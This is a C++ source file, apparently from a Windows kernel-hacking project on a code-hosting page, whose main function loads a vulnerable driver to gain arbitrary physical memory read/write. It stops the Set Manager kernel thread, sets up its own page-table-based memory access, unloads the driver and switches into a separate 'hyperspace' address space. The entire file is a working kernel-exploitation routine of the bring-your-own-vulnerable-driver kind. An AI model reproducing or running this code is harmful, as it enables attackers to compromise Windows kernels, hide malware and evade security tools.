You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
66 lines
1.5 KiB
66 lines
1.5 KiB
#include "ptm_ctx/ptm_ctx.hpp"
|
|
#include "set_mgr/set_mgr.hpp"
|
|
#include "hyper_ctx/hyper_ctx.hpp"
|
|
|
|
int __cdecl main(int argc, char** argv)
|
|
{
|
|
const auto [drv_handle, drv_key] = vdm::load_drv();
|
|
if (!drv_handle || drv_key.empty())
|
|
{
|
|
std::printf("[!] unable to load vulnerable driver...\n");
|
|
return -1;
|
|
}
|
|
|
|
vdm::read_phys_t _read_phys =
|
|
[&](void* addr, void* buffer, std::size_t size) -> bool
|
|
{
|
|
return vdm::read_phys(addr, buffer, size);
|
|
};
|
|
|
|
vdm::write_phys_t _write_phys =
|
|
[&](void* addr, void* buffer, std::size_t size) -> bool
|
|
{
|
|
return vdm::write_phys(addr, buffer, size);
|
|
};
|
|
|
|
vdm::vdm_ctx vdm(_read_phys, _write_phys);
|
|
ptm::ptm_ctx my_proc(&vdm);
|
|
|
|
const auto set_mgr_pethread =
|
|
set_mgr::get_setmgr_pethread(vdm);
|
|
|
|
const auto result =
|
|
set_mgr::stop_setmgr(vdm, set_mgr_pethread);
|
|
|
|
std::printf("[+] cr3 -> 0x%p\n", vdm.readcr3());
|
|
if (!vdm::unload_drv(drv_handle, drv_key))
|
|
{
|
|
std::printf("[!] unable to unload vulnerable driver...\n");
|
|
return -1;
|
|
}
|
|
|
|
_read_phys =
|
|
[&](void* addr, void* buffer, std::size_t size) -> bool
|
|
{
|
|
return my_proc.read_phys(buffer, addr, size);
|
|
};
|
|
|
|
_write_phys =
|
|
[&](void* addr, void* buffer, std::size_t size) -> bool
|
|
{
|
|
return my_proc.write_phys(buffer, addr, size);
|
|
};
|
|
|
|
vdm.set_read(_read_phys);
|
|
vdm.set_write(_write_phys);
|
|
|
|
hyperspace::hyper_ctx hyperspace(&my_proc);
|
|
hyperspace.hyper_jmp();
|
|
{
|
|
for (auto idx = 0u; idx < 10; ++idx)
|
|
std::printf("[+] (old thread) hyperspace cr3 -> 0x%p\n", vdm.readcr3());
|
|
}
|
|
hyperspace.hyper_ret();
|
|
std::printf("[+] press any key to close...\n");
|
|
std::getchar();
|
|
} |